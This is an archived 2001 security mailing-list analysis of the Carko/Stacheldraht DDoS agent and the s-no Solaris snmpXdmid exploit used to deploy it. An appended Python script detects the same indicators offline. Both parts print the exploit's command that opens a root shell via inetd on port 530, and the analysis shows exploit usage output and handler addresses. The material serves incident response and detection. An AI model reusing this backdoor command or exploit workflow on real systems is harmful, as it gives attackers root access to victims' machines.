---------- Forwarded message ----------
Date: Wed, 18 Apr 2001 17:17:40 -0600
From: Ryan Russell <ryanat_private>
To: INCIDENTSat_private
Subject: Carko/snmpXdmid Analysis v1.0

Carko/Stacheldraht v1.666 + antigl + yps Distributed Denial of Service Tool
4/18/2001 v1.0

The SecurityFocus ARIS Analyst Team wishes to thank Stefan Wagner for his contribution of the s-no binary, Borja Marcos for his contribution of files from a compromised host that had a rootkit installed, Kurt Grutzmacher for the source code to the Solaris x86 8 exploit, and our anonymous contributors.

There have been recent reports of an allegedly new Distributed Denial of Service (DDOS) tool being deployed in the wild named "Carko". Upon further analysis of this tool, it has been confirmed that "Carko" is actually a copy of "Stacheldraht v1.666 + antigl + yps", originally released by Psychoid and Randomizer in January of this year, with some minor modifications. Carko was initially publicized to the Incidents mailing list by an anonymous source.

"Stacheldraht v1.666 + antigl + yps" is a variant of the original "Stacheldraht" DDOS tool, which was based upon the "Tribal Flood Network" and "trin00" DDOS tools. As many of you may recall, these DDOS tools were credited with crippling many high-profile e-commerce sites such as Yahoo!, eBay and Amazon during February of 2000 by overwhelming their servers with enormous amounts of traffic, thus preventing legitimate requests from being fulfilled.

Carko is a near replica of Stacheldraht v1.666 + antigl + yps with some very slight variations:

1) Inspection of the binaries reveals that as little as one line of source code differs between Carko and Stacheldraht v1.666 + antigl + yps. Carko contains a different hard-coded IP address, 209.198.242.114, used to test spoofing, while Stacheldraht v1.666 + antigl + yps uses the address 3.3.3.3.

2) The Carko executable can typically be found in the directory /usr/share/man/mansps/ddos/carko.
3) It has been reported that a file named td was copied from elsewhere to the compromised host and given the local name carko during the rcp process. td is the original name of the "client" (agent) in Stacheldraht v1.666 + antigl + yps, of which Carko is a modification.

There are two hard-coded master servers (handlers) in this version of Carko. Master server addresses are compiled in during the make process. These are:

    131.216.135.41, sunset.ccsn.nevada.edu
    152.2.21.117, cc-matrix6.oit.unc.edu

While Carko is fundamentally just a rehash of a dated yet still effective DDOS tool, attackers are using much more recent exploits in order to deploy Carko/Stacheldraht v1.666 + antigl + yps. Specifically, there have been reported cases of the Solaris snmpXdmid buffer overflow vulnerability being exploited in order to backdoor systems and install Carko. The snmpXdmid vulnerability was reported on March 15, 2001, and a working exploit is being used in the wild. Because snmpXdmid is a service started by root, any code executed by an unauthorized attacker runs with superuser privileges. For more information regarding this vulnerability, please see the following database entry:

http://www.securityfocus.com/bid/2417

Typically, hosts are initially scanned via the RPC Portmapper (port 111) for RPC program number 100249, version 1, protocol 6 (TCP). This is the snmpXdmid service, usually started via /etc/rc3.d/S77dmi. After verifying that snmpXdmid is indeed running, an attacker may compromise the system via the buffer overflow vulnerability. While the attacker can perform virtually any action they desire once exploitation succeeds, many users have reported that a backdoor, and subsequently Carko, were installed following snmpXdmid exploitation.

SnmpXdmid/s-no Exploit Analysis

At least one binary copy of the snmpXdmid exploit has been found in the wild. This was discovered on a honeypot host, and was named s-no.
It is a SPARC ELF binary, compiled with Sun's WorkShop Compiler 4.2 on a Solaris 2.6 host. The exploit is run from the command line and takes a victim IP address and a victim OS version number as input. The exploit helpfully provides instructions if the parameters are not supplied:

    # ./s-no
    snmpXdmisd exploit for solaris SPARC
    Usage : ./s-no hostname 6|7|8
    E.g. $ ./s-no 127.0.0.1 6 (for solaris 2.6)

Upon running with the proper parameters, it queries the victim for the vulnerable daemon via portmapper, as noted previously. It then connects to the vulnerable service and delivers the overflow string. Contained within the string is the set of commands that will be executed on the victim upon successful exploitation:

    echo courier stream tcp nowait root /bin/sh sh -i > /tmp/.x;/usr/sbin/inetd -s /tmp/.x;rm -f /tmp/.x;nohup /etc/init.d/init.dmi start 1>&2 2>/dev/null &\;

The above set of commands writes a one-line inetd configuration to /tmp/.x, starts a second inetd instance in standalone mode (-s) with that file, which creates a root shell listening on port 530 ("courier" is mapped to 530 in /etc/services), removes the temporary file, and restarts the DMI daemon, which crashed during the overflow. By itself, this is easy to clean up after: simply stop or upgrade the vulnerable DMI daemon. After the port 530 backdoor has been connected to once, it does not restart. However, as previously noted, the attacker usually connects to 530 immediately and installs additional software, such as Carko. In at least one instance, a full rootkit was installed.
Here is what s-no looks like from the attacker's perspective:

    $ ./s-no 64.81.99.152 6
    retaddr = 0xef4a4398 safeaddr = 0xef20b330
    clnt_create: RPC: Unknown host
    $
    $ ./s-no 64.81.99.152 7
    retaddr = 0xff0369e0 safeaddr = 0xfea0b644
    clnt_call[_DmiComponentAdded]: RPC: Timed out
    Now try to connect the target 530 port, good luck.:)
    $
    $ ./s-no 64.81.99.152 8
    retaddr = 0xff0369e0 safeaddr = 0xfea0b644
    clnt_call[_DmiComponentAdded]: RPC: Timed out
    Now try to connect the target 530 port, good luck.:)
    $

The attack for Solaris 2.6 uses a different set of offsets (return address and "safe" address) from those for 7 and 8, and does not appear to work properly, at least not against our Solaris 7 test platform. The attacks for 7 and 8 execute as expected. The RPC timeout message is due to the remote victim service dying following delivery of the exploit. The exploit then goes on to invite the attacker to connect to port 530.

The exploit is not successful in every single case: at least one victim machine we tested did not execute the commands as expected, even though it was vulnerable. The DMI daemon still crashed, however, which blocks further attempts until it is restarted.

This particular exploit contains SPARC shellcode, so it will not work on Solaris x86 as-is, but an x86 version should be easy to create, so that is no guarantee of safety. There also exists what is reported to be a Solaris x86 8 exploit.

Attached to this note are a packet trace, truss output, and a capture of the TCP data sent, captured by using netcat to listen on a port that portmapper was configured to advertise as the vulnerable service.

This is the first version of this analysis. Additional versions will be published soon, containing analysis of a rootkit that was installed in one instance of a snmpXdmid compromise, and analysis of source code to a reported Solaris x86 8 exploit for snmpXdmid, which is different from the one discussed in this document.
Resources:

"Carko Information" Incidents Mailing List Message
http://www.securityfocus.com/archive/75/177265

New Variants of Trinity and Stacheldraht Distributed Denial of Service Tools
http://xforce.iss.net/alerts/advise61.php

"Trinity v3/ Stacheldraht 1.666" Distributed Denial of Service Tool
http://www.nipc.gov/warnings/advisories/2000/00-055.htm

The "Stacheldraht" distributed denial of service attack tool
http://www.securityfocus.com/library/1999

Distributed Denial of Service Defense Tactics
http://www.securityfocus.com/library/1930

Solaris snmpXdmid Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/2417
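The following Python triage helpers are an added example, not part of the SecurityFocus analysis above and not code from s-no, Carko or Stacheldraht. They turn three of the indicators the analysis describes into offline checks: whether portmapper advertises RPC program 100249 v1 over TCP (the s-no precondition), whether a captured overflow payload carries the inetd-based port 530 root shell, and whether a recovered agent binary is Carko (spoof-test address 209.198.242.114 and the two handler addresses) rather than stock Stacheldraht 1.666 (3.3.3.3). The rpcinfo output, /etc/services excerpt, captured payload bytes and "binary" blob are all constructed stand-ins; the filler bytes around the command string and the assumption that the addresses appear as dotted-quad strings in the agent binary are my own, not taken from the write-up.

```python
"""Offline triage for the snmpXdmid (s-no) -> port 530 backdoor -> Carko pattern.

Added example; all sample inputs below are constructed, not real captures.
"""
import re

SNMPXDMID_PROG = 100249            # RPC program number for the Solaris DMI mapper

# Addresses the write-up attributes to the binaries.
CARKO_SPOOF_TEST_IP = "209.198.242.114"
STACHELDRAHT_SPOOF_TEST_IP = "3.3.3.3"
CARKO_HANDLERS = ("131.216.135.41", "152.2.21.117")

# Constructed: 'rpcinfo -p victim' on an exposed host (port numbers are made up).
SAMPLE_RPCINFO = """\
   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    4   udp    111  rpcbind
    100249    1   tcp  32778
    100249    1   udp  32784
    100083    1   tcp  32777
"""

# Constructed excerpt of /etc/services, used to resolve the service name to a port.
SAMPLE_SERVICES = """\
smtp        25/tcp    mail
courier     530/tcp   rpc
"""

# Constructed: tail of an overflow string carrying the command quoted in the analysis,
# preceded by made-up non-printable filler and followed by NUL padding.
SAMPLE_PAYLOAD = (
    b"\x80\x1b\xff\xff" * 8
    + b"echo courier stream tcp nowait root /bin/sh sh -i > /tmp/.x;"
      b"/usr/sbin/inetd -s /tmp/.x;rm -f /tmp/.x;"
      b"nohup /etc/init.d/init.dmi start 1>&2 2>/dev/null &\\;"
    + b"\x00" * 16
)

# Constructed: a fake ELF-ish blob with the strings a Carko agent would carry.
SAMPLE_AGENT = (
    b"\x7fELF\x01\x02\x01" + b"\x00" * 9
    + b"209.198.242.114\x00131.216.135.41\x00152.2.21.117\x00"
    + b"/usr/share/man/mansps/ddos/carko\x00"
)

_PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{8,}")


def parse_rpcinfo(text):
    """Return (program, version, proto, port) tuples from 'rpcinfo -p' output."""
    entries = []
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 4 and f[0].isdigit():
            entries.append((int(f[0]), int(f[1]), f[2], int(f[3])))
    return entries


def snmpxdmid_tcp_ports(text):
    """TCP ports where program 100249 v1 is registered: the target s-no looks for."""
    return sorted(port for prog, vers, proto, port in parse_rpcinfo(text)
                  if prog == SNMPXDMID_PROG and vers == 1 and proto == "tcp")


def services_map(text):
    """Map (service name, proto) -> port from /etc/services text."""
    m = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and "/" in parts[1]:
            port, proto = parts[1].split("/", 1)
            m[(parts[0], proto)] = int(port)
    return m


def analyse_payload(payload, services_text=SAMPLE_SERVICES):
    """Extract the shell commands from captured overflow bytes and flag the backdoor.

    Looks for an 'echo <svc> stream <proto> <flags> <user> <prog>' inetd line and an
    'inetd -s <file>' invocation, and resolves the service name to its port.
    """
    svc = services_map(services_text)
    findings = {"commands": [], "inetd_config": None,
                "backdoor_port": None, "root_shell": False}
    for run in _PRINTABLE_RUN.findall(payload):
        for cmd in run.decode("ascii").split(";"):
            if cmd.strip():
                findings["commands"].append(cmd.strip())
    for cmd in findings["commands"]:
        m = re.match(r"echo\s+(\S+)\s+stream\s+(tcp|udp)\s+\S+\s+(\S+)\s+(\S+)", cmd)
        if m:
            name, proto, user, prog = m.groups()
            findings["backdoor_port"] = svc.get((name, proto))
            findings["root_shell"] = (user == "root" and prog.endswith("sh"))
        m = re.search(r"inetd\s+-s\s+(\S+)", cmd)
        if m:
            findings["inetd_config"] = m.group(1)
    return findings


def classify_ddos_agent(blob):
    """Tell a Carko agent from stock Stacheldraht 1.666 by its hard-coded addresses.

    Assumes (my assumption) the addresses are present as dotted-quad strings.
    """
    if CARKO_SPOOF_TEST_IP.encode() in blob:
        family = "carko"
    elif STACHELDRAHT_SPOOF_TEST_IP.encode() in blob:
        family = "stacheldraht-1.666"
    else:
        family = "unknown"
    handlers = [h for h in CARKO_HANDLERS if h.encode() in blob]
    return {"family": family, "handlers": handlers}


if __name__ == "__main__":
    print("snmpXdmid TCP ports:", snmpxdmid_tcp_ports(SAMPLE_RPCINFO))
    print("payload findings:", analyse_payload(SAMPLE_PAYLOAD))
    print("agent:", classify_ddos_agent(SAMPLE_AGENT))
```

On a live host the same functions would be fed the real `rpcinfo -p` output, the TCP data captured with netcat as described in the analysis, and the file found under /usr/share/man/mansps/ddos/. Note that `analyse_payload` keys on the inetd-line shape rather than on the literal word "courier", so a variant that picks a different service name or config path is still reported, with whatever port /etc/services resolves the name to.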
This archive was generated by hypermail 2b30 : Thu Apr 19 2001 - 01:37:15 PDT